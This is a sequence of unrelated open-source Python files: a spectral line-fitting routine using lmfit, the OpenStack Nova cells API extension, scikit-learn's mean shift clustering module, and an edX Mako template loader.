if verbose:
print('y[i] =', y[i], 'y_max =', y_max)
if y[i] >= float(y_max) / 20:
params['center_1'].min = x[i]
if verbose:
print('i =', i)
break
for i in range(len(x)-1, max_idx-1, -1):
if y[i] > float(y_max) / 20:
if verbose:
print('x[i] =', x[i],
'params["center_1"].min = {}'.format(
params['center_1'].min))
params['center_diff'].max = x[i] - params['center_1'].min
params['center_diff'].value = params['center_diff'].max / 2
break
if isinstance(params_in, lmfit.parameter.Parameters):
for k in params_in:
if k in params:
params[k].value = params_in[k].value
if isinstance(params_in, list):
if np.all([isinstance(par, lmfit.parameter.Parameters) for
par in params_in]):
for k in params:
params[k].value = np.average(
[par[k].value for par in params_in if par[k].stderr != 0],
weights=[1./par[k].stderr for par in params_in
if par[k].stderr != 0])
return params
def n_line_fit_model(params, x, data=None, eps_data=None,
line_type='voigt'):
i = 1
model = np.zeros_like(x)
while 1:
try:
amplitude = params['amplitude_{}'.format(i)].value
center = params['center_{}'.format(i)].value
sigma = params['sigma_{}'.format(i)].value
gamma_str = 'gamma_{}'.format(i)
skew_str = 'skew_{}'.format(i)
if gamma_str in params:
gamma = params[gamma_str].value
else:
gamma = None
if skew_str in params:
skew = params[skew_str].value
else:
skew = 0
if line_type == 'gaussian':
model += gaussian(x, amplitude, center, sigma)
elif line_type == 'lorentzian':
model += lorentzian(x, amplitude, center, sigma)
elif line_type == 'voigt':
model += lmfit.models.skewed_voigt(x, amplitude, center,
sigma, gamma, skew)
# model += (lmfit.models.voigt(x, amplitude, center, sigma) *
# x / center)
else:
raise TypeError('No model named ', line_type, ' avaliable.')
except:
break
i += 1
# amplitude_1 = params['amplitude_1'].value
# center_1 = params['center_1'].value
# sigma_1 = params['sigma_1'].value
# amplitude_2 = params['amplitude_2'].value
# center_2 = params['center_2'].value
# sigma_2 = params['sigma_2'].value
# model = gaussian(x, amplitude_1, center_1, sigma_1) * x / center_1
# model += gaussian(x, amplitude_2, center_2, sigma_2) * x / center_2
if data is None:
return model
if eps_data is None:
return model - data
return (model - data) / eps_data
def n_voigt_with_bg_model(params, x, data=None, eps_data=None, bg=None):
model = np.zeros_like(x)
# The two line gaussian background
# for i in range(2, 4):
# model += gaussian(x,
# params['amplitude_{}'.format(i)].value,
# params['center_{}'.format(i)].value,
# params['sigma_{}'.format(i)].value)
if 'bg_factor' in params:
if bg is None:
bg = np.ones_like(x)
model = params['bg_factor'].value * bg
else:
model = np.zeros_like(x)
# The voigt shaped photoline
for i in range(3):
try:
model += lmfit.models.skewed_voigt(
x,
params['amplitude_{}'.format(i+1)].value,
params['center_{}'.format(i+1)].value,
params['sigma_{}'.format(i+1)].value,
params['gamma_{}'.format(i+1)].value)
# params['skew_{}'.format(i+1)].value)
except:
break
if data is None:
return model
if eps_data is None:
return model - data
return (model - data) / eps_data
def n_voigt_with_bg_start_params(x=None, y=None, n_lines=2, bg=False):
params = lmfit.Parameters()
params.add('amplitude_1', 8e3, min=0)
params.add('center_1', value=16.5)
params.add('sigma_1', value=1e-3, min=0, max=1)
params.add('gamma_1', value=0.4, min=0, max=1)
# params.add('gamma_1', expr='sigma_1')
# params.add('skew_1', value=0.002, min=0)
if (x is not None) and (y is not None):
params['center_1'].value = x[np.nanargmax(y)]
if bg:
params.add('bg_factor', value=1, min=0.0, max=1.5)
if 1 < n_lines:
# params.add('amp_ratio', value=0.4, min=0.3, max=0.5)
# params.add('amplitude_2', expr='amplitude_1 * amp_ratio')
params.add('amplitude_2',
value=params['amplitude_1'].value * 0.7,
min=0)
# params.add('center_diff', value=5, min=0.3)
# params.add('center_2', expr='center_1 + center_diff')
params.add('center_2',
value=params['center_1'].value * 1.09,
min=14, max=22)
params.add('sigma_2', value=1e-4, min=0, max=1)
params.add('gamma_2', value=0.4, min=0, max=1)
# params.add('gamma_2', expr='sigma_2')
# params.add('skew_2', value=0, min=-1, max=1)
if 2 < n_lines:
params.add('amplitude_3', 2e3, min=0)
params.add('center_3', value=11.6, max=12, min=11.2)
params.add('sigma_3', value=1e-4, min=0, max=1)
params.add('gamma_3', value=0.4, min=0, max=1)
#
# params.add('amplitude_3', 1e3, min=5e2)
# params.add('center_3', value=19, min=17)
# params.add('sigma_3', value=0.5, min=0, max=1)
#
# params.add('amplitude_4', 5e2, min=2e2)
# params.add('center_4', value=16, min=15, max=17)
# params.add('sigma_4', value=0.5, min=0, max=1)
return params
def n_voight_with_bg_500_eV_start_params(x, y):
x0 = x[np.nanargmax(y)]
n_lines = 1
if x0 < 15:
n_lines += 1
if x0 < 11.5:
n_lines += 1
params = n_voigt_with_bg_start_params(x, y, n_lines=n_lines, bg=False)
params['center_1'].value = x0
if 'center_2' in params:
params['center_2'].value = x0 * 1.5
if 'center_3' in params:
params['center_3'].value = x0 * 2.0
centers = [x0, x0 * 1.55, x0 * 2]
amplitudes = [15000, 1000, 10]
for i in range(3):
if 'center_{}'.format(i+1) not in params:
continue
p = params['center_{}'.format(i+1)]
p.min = centers[i] * 0.9
p.max = centers[i] * 1.1
p.value = centers[i]
params['amplitude_{}'.format(i+1)].value = amplitudes[i]
return params
def poly_line(params, x, y=None, err=None):
mod = np.zeros_like(x)
for i in range(len(params)):
# print('\n{}({})'.format(i, len(params)))
# print(type(params))
# try:
# print(params)
# except:
# pass
# print('a_{}'.format(i))
# print(params['a_{}'.format(i)] * x**i)
# print(mod)
mod += params['a_{}'.format(i)] * x**i
if y is None:
return mod
if err is None:
return mod - y
return (mod - y) / err
def line_start_params(a_list):
if not isinstance(a_list, list):
raise TypeError('Function linse_start_params expected a list' +
' as input parameter, got {}.'.format(type(a_list)))
params = lmfit.Parameters()
for i, a in enumerate(a_list):
params.add('a_{}'.format(i), value=a)
return params
def r_to_e_conversion(params, r, e=None):
r0 = params['r0'].value
E0 = params['E0'].value
a = params['a'].value
b = params['b'].value
mod = E0 + a * (r - r0) + b * (1/r - 1/r0)
if e is None:
return mod
return mod - e
def r_to_e_conversion_start_params(r=[],e=[]):
params = lmfit.Parameters()
params.add('r0', 15, vary=False)
params.add('E0', e.mean() if len(e) > 0 else 350)
params.add('a', 1)
params.add('b', 1)
return params
def get_params_and_funktion(setting, gas, x, y, bg=None):
if gas == 'Kr':
kws = {'line_type': 'voigt'}
params = start_params(x, y, n_lines=2, **kws)
fit_funk = n_line_fit_model
elif gas == 'N2':
kws = {'bg': bg}
# get start parameters
if setting == 500:
params = skewed_gauss_for_500_eV_start_params(
x, y, bg=True)
# params_r_proj['bg_factor'].value = 1
fit_funk = skewed_gauss_for_500_eV
for k, v in params.items():
if k.startswith('skew'):
v.value = 0
v.vary = False
else:
params = n_voigt_with_bg_start_params(x, y, n_lines=1,
bg=True)
if 'bg_factor' in params:
params['bg_factor'].vary = False
fit_funk = n_voigt_with_bg_model
return params, fit_funk, kws, 'powel'
def find_lines(rth_image, r_axis_mm, th_axis_rad,
setting,
n_lines_fit=2, n_lines_store=2,
bg=None, gas='Kr', return_line_params_list=False,
verbose=False):
# Fit to r projection
r_projection = rth_image.sum(axis=0)
params_r_proj_initial, fit_funk, kws, method = get_params_and_funktion(
setting, gas, r_axis_mm, r_projection, bg)
r_proj_result = lmfit.minimize(fit_funk, params_r_proj_initial,
method=method,
args=(r_axis_mm, r_projection), kws=kws)
# Fit for each line based on the r projection fit
line_params_list = []
line_results_list = []
n_th = len(th_axis_rad)
# Make space for the results in a nicer format
r = np.empty((n_th, n_lines_store), dtype=float)
w = np.empty_like(r)
a = np.empty_like(r)
red_chi2 = np.empty(n_th)
# Get initial parameters
line_initial_params, ... = get_params_and_funktion(setting, gas, r_axis_mm,
r_projection, bg)
for i_th in range(n_th):
# map some stuff from the full projection to each line
amp_scaling = rth_image[i_th, :].sum() / r_projection.sum()
for k, v in line_initial_params.items():
v.value = r_proj_result.params[k].value
if k.startswith(('amp', 'bg')):
v.value *= amp_scaling
v.min *= amp_scaling
v.max *= amp_scaling
if k.startswith('skew'):
v.vary = False
# if k.startswith('center'):
# # Lock the centers
# v.vary = False
line_results_list.append(
lmfit.minimize(model,
line_initial_params, method=method,
args=(r_axis_mm, rth_image[i_th, :]),
kws=kws))
line_params_list.append(line_results_list[-1].params)
for line in range(n_lines_store):
r[i_th, line] = line_params_list[-1][
'center_{}'.format(line+1)].value
# For the width, we need to do some calculations
# based on
# https://en.wikipedia.org/wiki/Voigt_profile
fg = (line_params_list[-1]['sigma_{}'.format(line+1)].value
* _gauss_fwhm_factor)
try:
fl = (line_params_list[-1][
'gamma_{}'.format(line+1)].value * 2)
w[i_th, line] = (0.5346 * fl +
np.sqrt(0.2166 * fl**2 + fg**2)) / 2
except:
w[i_th, line] = fg / 2
w[i_th, line] /= _gauss_fwhm_factor
a[i_th, line] = line_params_list[-1][
'amplitude_{}'.format(line+1)].value
red_chi2[i_th] = line_results_list[-1].redchi
update_progress(i_th, n_th, verbose=verbose)
if verbose:
print('')
lmfit.report_fit(line_results_list[len(line_results_list)//2])
# w_1[w_1 <= 0] = np.inf
# w_2[w_2 <= 0] = np.inf
if return_line_params_list:
return r, w, a, red_chi2, line_params_list
return r, w, a, red_chi2 | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The cells extension."""
from oslo_config import cfg
import oslo_messaging as messaging
from oslo_utils import strutils
import six
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute.schemas.v3 import cells
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova.cells import rpcapi as cells_rpcapi
from nova import exception
from nova.i18n import _
from nova import rpc
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('capabilities', 'nova.cells.opts', group='cells')
ALIAS = "os-cells"
authorize = extensions.os_compute_authorizer(ALIAS)
def _filter_keys(item, keys):
"""Filters all model attributes except for keys
item is a dict
"""
return {k: v for k, v in item.iteritems() if k in keys}
def _fixup_cell_info(cell_info, keys):
"""If the transport_url is present in the cell, derive username,
rpc_host, and rpc_port from it.
"""
if 'transport_url' not in cell_info:
return
# Disassemble the transport URL
transport_url = cell_info.pop('transport_url')
try:
transport_url = rpc.get_transport_url(transport_url)
except messaging.InvalidTransportURL:
# Just go with None's
for key in keys:
cell_info.setdefault(key, None)
return
if not transport_url.hosts:
return
transport_host = transport_url.hosts[0]
transport_field_map = {'rpc_host': 'hostname', 'rpc_port': 'port'}
for key in keys:
if key in cell_info:
continue
transport_field = transport_field_map.get(key, key)
cell_info[key] = getattr(transport_host, transport_field)
def _scrub_cell(cell, detail=False):
keys = ['name', 'username', 'rpc_host', 'rpc_port']
if detail:
keys.append('capabilities')
cell_info = _filter_keys(cell, keys + ['transport_url'])
_fixup_cell_info(cell_info, keys)
cell_info['type'] = 'parent' if cell['is_parent'] else 'child'
return cell_info
class CellsController(wsgi.Controller):
"""Controller for Cell resources."""
def __init__(self):
self.cells_rpcapi = cells_rpcapi.CellsAPI()
def _get_cells(self, ctxt, req, detail=False):
"""Return all cells."""
# Ask the CellsManager for the most recent data
items = self.cells_rpcapi.get_cell_info_for_neighbors(ctxt)
items = common.limited(items, req)
items = [_scrub_cell(item, detail=detail) for item in items]
return dict(cells=items)
@extensions.expected_errors(501)
@common.check_cells_enabled
def index(self, req):
"""Return all cells in brief."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req)
@extensions.expected_errors(501)
@common.check_cells_enabled
def detail(self, req):
"""Return all cells in detail."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req, detail=True)
@extensions.expected_errors(501)
@common.check_cells_enabled
def info(self, req):
"""Return name and capabilities for this cell."""
context = req.environ['nova.context']
authorize(context)
cell_capabs = {}
my_caps = CONF.cells.capabilities
for cap in my_caps:
key, value = cap.split('=')
cell_capabs[key] = value
cell = {'name': CONF.cells.name,
'type': 'self',
'rpc_host': None,
'rpc_port': 0,
'username': None,
'capabilities': cell_capabs}
return dict(cell=cell)
@extensions.expected_errors((404, 501))
@common.check_cells_enabled
def capacities(self, req, id=None):
"""Return capacities for a given cell or all cells."""
# TODO(kaushikc): return capacities as a part of cell info and
# cells detail calls in v3, along with capabilities
context = req.environ['nova.context']
authorize(context)
try:
capacities = self.cells_rpcapi.get_capacities(context,
cell_name=id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return dict(cell={"capacities": capacities})
@extensions.expected_errors((404, 501))
@common.check_cells_enabled
def show(self, req, id):
"""Return data about the given cell name. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
cell = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
# NOTE(gmann): Returns 200 for backwards compatibility but should be 204
# as this operation complete the deletion of aggregate resource and return
# no response body.
@extensions.expected_errors((403, 404, 501))
@common.check_cells_enabled
def delete(self, req, id):
"""Delete a child or parent cell entry. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
authorize(context, action="delete")
try:
num_deleted = self.cells_rpcapi.cell_delete(context, id)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
if num_deleted == 0:
raise exc.HTTPNotFound(
explanation=_("Cell %s doesn't exist.") % id)
def _normalize_cell(self, cell, existing=None):
"""Normalize input cell data. Normalizations include:
* Converting cell['type'] to is_parent boolean.
* Merging existing transport URL with transport information.
"""
# Start with the cell type conversion
if 'type' in cell:
cell['is_parent'] = cell['type'] == 'parent'
del cell['type']
# Avoid cell type being overwritten to 'child'
elif existing:
cell['is_parent'] = existing['is_parent']
else:
cell['is_parent'] = False
# Now we disassemble the existing transport URL...
transport_url = existing.get('transport_url') if existing else None
transport_url = rpc.get_transport_url(transport_url)
if 'rpc_virtual_host' in cell:
transport_url.virtual_host = cell.pop('rpc_virtual_host')
if not transport_url.hosts:
transport_url.hosts.append(messaging.TransportHost())
transport_host = transport_url.hosts[0]
if 'rpc_port' in cell:
cell['rpc_port'] = int(cell['rpc_port'])
# Copy over the input fields
transport_field_map = {
'username': 'username',
'password': 'password',
'hostname': 'rpc_host',
'port': 'rpc_port',
}
for key, input_field in transport_field_map.items():
# Only override the value if we're given an override
if input_field in cell:
setattr(transport_host, key, cell.pop(input_field))
# Now set the transport URL
cell['transport_url'] = str(transport_url)
# NOTE(gmann): Returns 200 for backwards compatibility but should be 201
# as this operation complete the creation of aggregates resource when
# returning a response.
@extensions.expected_errors((400, 403, 501))
@common.check_cells_enabled
@validation.schema(cells.create)
def create(self, req, body):
"""Create a child cell entry."""
context = req.environ['nova.context']
authorize(context)
authorize(context, action="create")
cell = body['cell']
self._normalize_cell(cell)
try:
cell = self.cells_rpcapi.cell_create(context, cell)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors((400, 403, 404, 501))
@common.check_cells_enabled
@validation.schema(cells.update)
def update(self, req, id, body):
"""Update a child cell entry. 'id' is the cell name to update."""
context = req.environ['nova.context']
authorize(context)
authorize(context, action="update")
cell = body['cell']
cell.pop('id', None)
try:
# NOTE(Vek): There is a race condition here if multiple
# callers are trying to update the cell
# information simultaneously. Since this
# operation is administrative in nature, and
# will be going away in the future, I don't see
# it as much of a problem...
existing = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
self._normalize_cell(cell, existing)
try:
cell = self.cells_rpcapi.cell_update(context, id, cell)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
# NOTE(gmann): Returns 200 for backwards compatibility but should be 204
# as this operation complete the sync instance info and return
# no response body.
@extensions.expected_errors((400, 501))
@common.check_cells_enabled
@validation.schema(cells.sync_instances)
def sync_instances(self, req, body):
"""Tell all cells to sync instance info."""
context = req.environ['nova.context']
authorize(context)
authorize(context, action="sync_instances")
project_id = body.pop('project_id', None)
deleted = body.pop('deleted', False)
updated_since = body.pop('updated_since', None)
if isinstance(deleted, six.string_types):
deleted = strutils.bool_from_string(deleted, strict=True)
self.cells_rpcapi.sync_instances(context, project_id=project_id,
updated_since=updated_since, deleted=deleted)
class Cells(extensions.V3APIExtensionBase):
"""Enables cells-related functionality such as adding neighbor cells,
listing neighbor cells, and getting the capabilities of the local cell.
"""
name = "Cells"
alias = ALIAS
version = 1
def get_resources(self):
coll_actions = {
'detail': 'GET',
'info': 'GET',
'sync_instances': 'POST',
'capacities': 'GET',
}
memb_actions = {
'capacities': 'GET',
}
res = extensions.ResourceExtension(ALIAS, CellsController(),
collection_actions=coll_actions,
member_actions=memb_actions)
return [res]
def get_controller_extensions(self):
return [] | unknown | codeparrot/codeparrot-clean | ||
"""Mean shift clustering algorithm.
Mean shift clustering aims to discover *blobs* in a smooth density of
samples. It is a centroid based algorithm, which works by updating candidates
for centroids to be the mean of the points within a given region. These
candidates are then filtered in a post-processing stage to eliminate
near-duplicates to form the final set of centroids.
Seeding is performed using a binning technique for scalability.
"""
# Authors: Conrad Lee <conradlee@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Martino Sorbaro <martino.sorbaro@ed.ac.uk>
import numpy as np
import warnings
from collections import defaultdict
from ..externals import six
from ..utils.validation import check_is_fitted
from ..utils import extmath, check_random_state, gen_batches, check_array
from ..base import BaseEstimator, ClusterMixin
from ..neighbors import NearestNeighbors
from ..metrics.pairwise import pairwise_distances_argmin
from ..externals.joblib import Parallel
from ..externals.joblib import delayed
def estimate_bandwidth(X, quantile=0.3, n_samples=None, random_state=0):
"""Estimate the bandwidth to use with the mean-shift algorithm.
That this function takes time at least quadratic in n_samples. For large
datasets, it's wise to set that parameter to a small value.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
Input points.
quantile : float, default 0.3
should be between [0, 1]
0.5 means that the median of all pairwise distances is used.
n_samples : int, optional
The number of samples to use. If not given, all samples are used.
random_state : int or RandomState
Pseudo-random number generator state used for random sampling.
Returns
-------
bandwidth : float
The bandwidth parameter.
"""
random_state = check_random_state(random_state)
if n_samples is not None:
idx = random_state.permutation(X.shape[0])[:n_samples]
X = X[idx]
nbrs = NearestNeighbors(n_neighbors=int(X.shape[0] * quantile))
nbrs.fit(X)
bandwidth = 0.
for batch in gen_batches(len(X), 500):
d, _ = nbrs.kneighbors(X[batch, :], return_distance=True)
bandwidth += np.max(d, axis=1).sum()
return bandwidth / X.shape[0]
# separate function for each seed's iterative loop
def _mean_shift_single_seed(my_mean, X, nbrs, max_iter):
# For each seed, climb gradient until convergence or max_iter
bandwidth = nbrs.get_params()['radius']
stop_thresh = 1e-3 * bandwidth # when mean has converged
completed_iterations = 0
while True:
# Find mean of points within bandwidth
i_nbrs = nbrs.radius_neighbors([my_mean], bandwidth,
return_distance=False)[0]
points_within = X[i_nbrs]
if len(points_within) == 0:
break # Depending on seeding strategy this condition may occur
my_old_mean = my_mean # save the old mean
my_mean = np.mean(points_within, axis=0)
# If converged or at max_iter, adds the cluster
if (extmath.norm(my_mean - my_old_mean) < stop_thresh or
completed_iterations == max_iter):
return tuple(my_mean), len(points_within)
completed_iterations += 1
def mean_shift(X, bandwidth=None, seeds=None, bin_seeding=False,
min_bin_freq=1, cluster_all=True, max_iter=300,
max_iterations=None, n_jobs=1):
"""Perform mean shift clustering of data using a flat kernel.
Read more in the :ref:`User Guide <mean_shift>`.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
Input data.
bandwidth : float, optional
Kernel bandwidth.
If bandwidth is not given, it is determined using a heuristic based on
the median of all pairwise distances. This will take quadratic time in
the number of samples. The sklearn.cluster.estimate_bandwidth function
can be used to do this more efficiently.
seeds : array-like, shape=[n_seeds, n_features] or None
Point used as initial kernel locations. If None and bin_seeding=False,
each data point is used as a seed. If None and bin_seeding=True,
see bin_seeding.
bin_seeding : boolean, default=False
If true, initial kernel locations are not locations of all
points, but rather the location of the discretized version of
points, where points are binned onto a grid whose coarseness
corresponds to the bandwidth. Setting this option to True will speed
up the algorithm because fewer seeds will be initialized.
Ignored if seeds argument is not None.
min_bin_freq : int, default=1
To speed up the algorithm, accept only those bins with at least
min_bin_freq points as seeds.
cluster_all : boolean, default True
If true, then all points are clustered, even those orphans that are
not within any kernel. Orphans are assigned to the nearest kernel.
If false, then orphans are given cluster label -1.
max_iter : int, default 300
Maximum number of iterations, per seed point before the clustering
operation terminates (for that seed point), if has not converged yet.
n_jobs : int
The number of jobs to use for the computation. This works by computing
each of the n_init runs in parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
Returns
-------
cluster_centers : array, shape=[n_clusters, n_features]
Coordinates of cluster centers.
labels : array, shape=[n_samples]
Cluster labels for each point.
Notes
-----
See examples/cluster/plot_meanshift.py for an example.
"""
# FIXME To be removed in 0.18
if max_iterations is not None:
warnings.warn("The `max_iterations` parameter has been renamed to "
"`max_iter` from version 0.16. The `max_iterations` "
"parameter will be removed in 0.18", DeprecationWarning)
max_iter = max_iterations
if bandwidth is None:
bandwidth = estimate_bandwidth(X)
elif bandwidth <= 0:
raise ValueError("bandwidth needs to be greater than zero or None,\
got %f" % bandwidth)
if seeds is None:
if bin_seeding:
seeds = get_bin_seeds(X, bandwidth, min_bin_freq)
else:
seeds = X
n_samples, n_features = X.shape
center_intensity_dict = {}
nbrs = NearestNeighbors(radius=bandwidth).fit(X)
# execute iterations on all seeds in parallel
all_res = Parallel(n_jobs=n_jobs)(
delayed(_mean_shift_single_seed)
(seed, X, nbrs, max_iter) for seed in seeds)
# copy results in a dictionary
for i in range(len(seeds)):
if all_res[i] is not None:
center_intensity_dict[all_res[i][0]] = all_res[i][1]
if not center_intensity_dict:
# nothing near seeds
raise ValueError("No point was within bandwidth=%f of any seed."
" Try a different seeding strategy \
or increase the bandwidth."
% bandwidth)
# POST PROCESSING: remove near duplicate points
# If the distance between two kernels is less than the bandwidth,
# then we have to remove one because it is a duplicate. Remove the
# one with fewer points.
sorted_by_intensity = sorted(center_intensity_dict.items(),
key=lambda tup: tup[1], reverse=True)
sorted_centers = np.array([tup[0] for tup in sorted_by_intensity])
unique = np.ones(len(sorted_centers), dtype=np.bool)
nbrs = NearestNeighbors(radius=bandwidth).fit(sorted_centers)
for i, center in enumerate(sorted_centers):
if unique[i]:
neighbor_idxs = nbrs.radius_neighbors([center],
return_distance=False)[0]
unique[neighbor_idxs] = 0
unique[i] = 1 # leave the current point as unique
cluster_centers = sorted_centers[unique]
# ASSIGN LABELS: a point belongs to the cluster that it is closest to
nbrs = NearestNeighbors(n_neighbors=1).fit(cluster_centers)
labels = np.zeros(n_samples, dtype=np.int)
distances, idxs = nbrs.kneighbors(X)
if cluster_all:
labels = idxs.flatten()
else:
labels.fill(-1)
bool_selector = distances.flatten() <= bandwidth
labels[bool_selector] = idxs.flatten()[bool_selector]
return cluster_centers, labels
def get_bin_seeds(X, bin_size, min_bin_freq=1):
"""Finds seeds for mean_shift.
Finds seeds by first binning data onto a grid whose lines are
spaced bin_size apart, and then choosing those bins with at least
min_bin_freq points.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
Input points, the same points that will be used in mean_shift.
bin_size : float
Controls the coarseness of the binning. Smaller values lead
to more seeding (which is computationally more expensive). If you're
not sure how to set this, set it to the value of the bandwidth used
in clustering.mean_shift.
min_bin_freq : integer, optional
Only bins with at least min_bin_freq will be selected as seeds.
Raising this value decreases the number of seeds found, which
makes mean_shift computationally cheaper.
Returns
-------
bin_seeds : array-like, shape=[n_samples, n_features]
Points used as initial kernel positions in clustering.mean_shift.
"""
# Bin points
bin_sizes = defaultdict(int)
for point in X:
binned_point = np.round(point / bin_size)
bin_sizes[tuple(binned_point)] += 1
# Select only those bins as seeds which have enough members
bin_seeds = np.array([point for point, freq in six.iteritems(bin_sizes) if
freq >= min_bin_freq], dtype=np.float32)
if len(bin_seeds) == len(X):
warnings.warn("Binning data failed with provided bin_size=%f,"
" using data points as seeds." % bin_size)
return X
bin_seeds = bin_seeds * bin_size
return bin_seeds
class MeanShift(BaseEstimator, ClusterMixin):
"""Mean shift clustering using a flat kernel.
Mean shift clustering aims to discover "blobs" in a smooth density of
samples. It is a centroid-based algorithm, which works by updating
candidates for centroids to be the mean of the points within a given
region. These candidates are then filtered in a post-processing stage to
eliminate near-duplicates to form the final set of centroids.
Seeding is performed using a binning technique for scalability.
Read more in the :ref:`User Guide <mean_shift>`.
Parameters
----------
bandwidth : float, optional
Bandwidth used in the RBF kernel.
If not given, the bandwidth is estimated using
sklearn.cluster.estimate_bandwidth; see the documentation for that
function for hints on scalability (see also the Notes, below).
seeds : array, shape=[n_samples, n_features], optional
Seeds used to initialize kernels. If not set,
the seeds are calculated by clustering.get_bin_seeds
with bandwidth as the grid size and default values for
other parameters.
bin_seeding : boolean, optional
If true, initial kernel locations are not locations of all
points, but rather the location of the discretized version of
points, where points are binned onto a grid whose coarseness
corresponds to the bandwidth. Setting this option to True will speed
up the algorithm because fewer seeds will be initialized.
default value: False
Ignored if seeds argument is not None.
min_bin_freq : int, optional
To speed up the algorithm, accept only those bins with at least
min_bin_freq points as seeds. If not defined, set to 1.
cluster_all : boolean, default True
If true, then all points are clustered, even those orphans that are
not within any kernel. Orphans are assigned to the nearest kernel.
If false, then orphans are given cluster label -1.
n_jobs : int
The number of jobs to use for the computation. This works by computing
each of the n_init runs in parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
Attributes
----------
cluster_centers_ : array, [n_clusters, n_features]
Coordinates of cluster centers.
labels_ :
Labels of each point.
Notes
-----
Scalability:
Because this implementation uses a flat kernel and
a Ball Tree to look up members of each kernel, the complexity will is
to O(T*n*log(n)) in lower dimensions, with n the number of samples
and T the number of points. In higher dimensions the complexity will
tend towards O(T*n^2).
Scalability can be boosted by using fewer seeds, for example by using
a higher value of min_bin_freq in the get_bin_seeds function.
Note that the estimate_bandwidth function is much less scalable than the
mean shift algorithm and will be the bottleneck if it is used.
References
----------
Dorin Comaniciu and Peter Meer, "Mean Shift: A robust approach toward
feature space analysis". IEEE Transactions on Pattern Analysis and
Machine Intelligence. 2002. pp. 603-619.
"""
def __init__(self, bandwidth=None, seeds=None, bin_seeding=False,
min_bin_freq=1, cluster_all=True, n_jobs=1):
self.bandwidth = bandwidth
self.seeds = seeds
self.bin_seeding = bin_seeding
self.cluster_all = cluster_all
self.min_bin_freq = min_bin_freq
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Perform clustering.
Parameters
-----------
X : array-like, shape=[n_samples, n_features]
Samples to cluster.
"""
X = check_array(X)
self.cluster_centers_, self.labels_ = \
mean_shift(X, bandwidth=self.bandwidth, seeds=self.seeds,
min_bin_freq=self.min_bin_freq,
bin_seeding=self.bin_seeding,
cluster_all=self.cluster_all, n_jobs=self.n_jobs)
return self
def predict(self, X):
"""Predict the closest cluster each sample in X belongs to.
Parameters
----------
X : {array-like, sparse matrix}, shape=[n_samples, n_features]
New data to predict.
Returns
-------
labels : array, shape [n_samples,]
Index of the cluster each sample belongs to.
"""
check_is_fitted(self, "cluster_centers_")
return pairwise_distances_argmin(X, self.cluster_centers_) | unknown | codeparrot/codeparrot-clean | ||
import logging
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.template.base import TemplateDoesNotExist
from django.template.loaders.filesystem import Loader as FilesystemLoader
from django.template.loaders.app_directories import Loader as AppDirectoriesLoader
from django.template import Engine
from edxmako.template import Template
from openedx.core.lib.tempdir import mkdtemp_clean
log = logging.getLogger(__name__)
class MakoLoader(object):
"""
This is a Django loader object which will load the template as a
Mako template if the first line is "## mako". It is based off BaseLoader
in django.template.loader.
"""
is_usable = False
def __init__(self, base_loader):
# base_loader is an instance of a BaseLoader subclass
self.base_loader = base_loader
module_directory = getattr(settings, 'MAKO_MODULE_DIR', None)
if module_directory is None:
log.warning("For more caching of mako templates, set the MAKO_MODULE_DIR in settings!")
module_directory = mkdtemp_clean()
self.module_directory = module_directory
def __call__(self, template_name, template_dirs=None):
return self.load_template(template_name, template_dirs)
def load_template(self, template_name, template_dirs=None):
source, file_path = self.load_template_source(template_name, template_dirs)
if source.startswith("## mako\n"):
# This is a mako template
template = Template(filename=file_path,
module_directory=self.module_directory,
input_encoding='utf-8',
output_encoding='utf-8',
uri=template_name)
return template, None
else:
# This is a regular template
try:
template = Engine.get_default().from_string(source)
return template, None
except ImproperlyConfigured:
# Either no DjangoTemplates engine was configured -or- multiple engines
# were configured, making the get_default() call above fail.
raise
except TemplateDoesNotExist:
# If compiling the loaded template raises TemplateDoesNotExist, back off to
# returning the source and display name for the requested template.
# This allows for eventual correct identification of the actual template that does
# not exist.
return source, file_path
def load_template_source(self, template_name, template_dirs=None):
# Just having this makes the template load as an instance, instead of a class.
return self.base_loader.load_template_source(template_name, template_dirs)
def reset(self):
self.base_loader.reset()
class MakoFilesystemLoader(MakoLoader):
is_usable = True
